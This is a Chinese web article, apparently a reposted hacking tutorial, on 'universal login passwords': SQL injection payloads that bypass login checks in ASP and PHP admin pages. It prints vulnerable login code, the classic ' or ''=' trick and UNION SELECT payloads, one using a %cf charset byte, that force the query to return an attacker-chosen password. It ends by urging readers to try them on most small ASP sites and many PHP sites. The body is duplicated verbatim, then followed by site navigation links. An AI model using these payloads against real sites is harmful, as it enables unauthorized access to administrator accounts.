黑客入侵常用的新型万能登陆密码
网络安全 2021-07-03 09:40www.168986.cn网络安全知识
对于过滤了单引号或者做了post防注入的 站点,此方法也无能为力了;但对于很多对登陆端没做处理的网站,此方法值得一试,尤其是你已经知道源码了却不能执行命令(ACCESS数据库)或者对方能 报错( MYSQL数据库)。
我们回顾下老的万能密码or漏洞的实现机制,先帖一段asp源码
---------------------------老的存在or漏洞的asp代码----------------------------------------
username = request.form("username")
password = request.form("password ")
set rs=server.createobject("adodb.recordset")
sql = "select from admin where UserName='"&username&"' And PassWord='"& password &"'"
rs.open sql,conn,1,3--------------------------------------------------------------------------------------------------------
将表单中的username和password数据分别赋值给username和password,执行
select from admin where UserName='"&username&"' And PassWord='"&password&"' 语句
但如果被赋值的username是 ' or ''=' (password任意填写)则SQL语句变成了
select from admin where UserName='' or ''='' And PassWord='123'
''=''条件成立,则语句成功找到管理表里首位的帐号身份验证登陆,因而成了or漏洞,除' or ''='以外,'or'='or' 啊什么的都可以,于是早年or漏洞形成了万能登陆密码。
针对这种or漏洞,很多asp站点进行了改进,改进后的源码大致如下
---------------------------后来经过改进后的asp代码-----------------------------------------
username = request.form("username")
password = request.form("password ")
set rs=server.createobject("adodb.recordset")
sql = "select [password] from admin where UserName='"&username&"'"
rs.open sql,conn,1,3
If password = rs("password") then
…’登陆成功,文章来源http://.oldjun./
End if--------------------------------------------------------------------------------------------------------
现在很多asp站点的登陆页面都是这么写的,如果是mssql,还可以执行SQL语句;但如果是ACCESS,很多人应该都会望而却步了吧?其实在没有过滤单引号的情况下,我们还是可以用“万能密码”登陆进后台的。
狼蚁网站SEO优化我们进入主题,讨论新型万能登陆密码,以php代码为例,由于字符集编码的问题,管理登陆端可以注入,先看源码
-----------存在字符集漏洞或者magic_quotes_gpc为off的php代码-------------------
$row=$DB->query_first("SELECT FROM admin WHERE username='$username'");
If($row){
if($password!=$row[password]) {
…..//成功,文章来源http://.oldjun./
}else{
echo "用户名或密码错误!";
}
}else{
echo "用户名或密码错误!";
}--------------------------------------------------------------------------------------------------------
由于字符集问题,我们可以注入,但由于回显都一样,所以猜不到数据。根据错误提示,我们发现管理表一共6列,password在第三列,于是我们构造如下用户名与密码
Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
Password=1
带入登陆框,sql语句为
SELECT FROM admin WHERE username='-1蟎' union select 1,1 as password,1,1,1,1
前面的用户名肯定不存在,于是select出来的password就是1了,就等于提交的password了,经测试,成功绕过验证。
现在我们再回头看看之前改进过的asp登陆代码,我们该如何绕过呢,原理同上
Username=-1' union select 1 as [password] from admin where '1'='1
Password=1
呵呵,轻松绕过认证,到此为止大家知道该如何利用了吧,对于现在绝大多数的小asp站以及一定规模的php站点,大家不防试试这个万能密码~
我们回顾下老的万能密码or漏洞的实现机制,先帖一段asp源码
---------------------------老的存在or漏洞的asp代码----------------------------------------
复制代码
代码如下:username = request.form("username")
password = request.form("password ")
set rs=server.createobject("adodb.recordset")
sql = "select from admin where UserName='"&username&"' And PassWord='"& password &"'"
rs.open sql,conn,1,3--------------------------------------------------------------------------------------------------------
将表单中的username和password数据分别赋值给username和password,执行
select from admin where UserName='"&username&"' And PassWord='"&password&"' 语句
但如果被赋值的username是 ' or ''=' (password任意填写)则SQL语句变成了
select from admin where UserName='' or ''='' And PassWord='123'
''=''条件成立,则语句成功找到管理表里首位的帐号身份验证登陆,因而成了or漏洞,除' or ''='以外,'or'='or' 啊什么的都可以,于是早年or漏洞形成了万能登陆密码。
针对这种or漏洞,很多asp站点进行了改进,改进后的源码大致如下
---------------------------后来经过改进后的asp代码-----------------------------------------
复制代码
代码如下:username = request.form("username")
password = request.form("password ")
set rs=server.createobject("adodb.recordset")
sql = "select [password] from admin where UserName='"&username&"'"
rs.open sql,conn,1,3
If password = rs("password") then
…’登陆成功,文章来源http://.oldjun./
End if--------------------------------------------------------------------------------------------------------
现在很多asp站点的登陆页面都是这么写的,如果是mssql,还可以执行SQL语句;但如果是ACCESS,很多人应该都会望而却步了吧?其实在没有过滤单引号的情况下,我们还是可以用“万能密码”登陆进后台的。
狼蚁网站SEO优化我们进入主题,讨论新型万能登陆密码,以php代码为例,由于字符集编码的问题,管理登陆端可以注入,先看源码
-----------存在字符集漏洞或者magic_quotes_gpc为off的php代码-------------------
复制代码
代码如下:$row=$DB->query_first("SELECT FROM admin WHERE username='$username'");
If($row){
if($password!=$row[password]) {
…..//成功,文章来源http://.oldjun./
}else{
echo "用户名或密码错误!";
}
}else{
echo "用户名或密码错误!";
}--------------------------------------------------------------------------------------------------------
由于字符集问题,我们可以注入,但由于回显都一样,所以猜不到数据。根据错误提示,我们发现管理表一共6列,password在第三列,于是我们构造如下用户名与密码
Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
Password=1
带入登陆框,sql语句为
SELECT FROM admin WHERE username='-1蟎' union select 1,1 as password,1,1,1,1
前面的用户名肯定不存在,于是select出来的password就是1了,就等于提交的password了,经测试,成功绕过验证。
现在我们再回头看看之前改进过的asp登陆代码,我们该如何绕过呢,原理同上
Username=-1' union select 1 as [password] from admin where '1'='1
Password=1
呵呵,轻松绕过认证,到此为止大家知道该如何利用了吧,对于现在绝大多数的小asp站以及一定规模的php站点,大家不防试试这个万能密码~
上一篇:php+mysql5半自动注入工具图文教程
下一篇:个人主机 入侵网络攻击的步骤
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座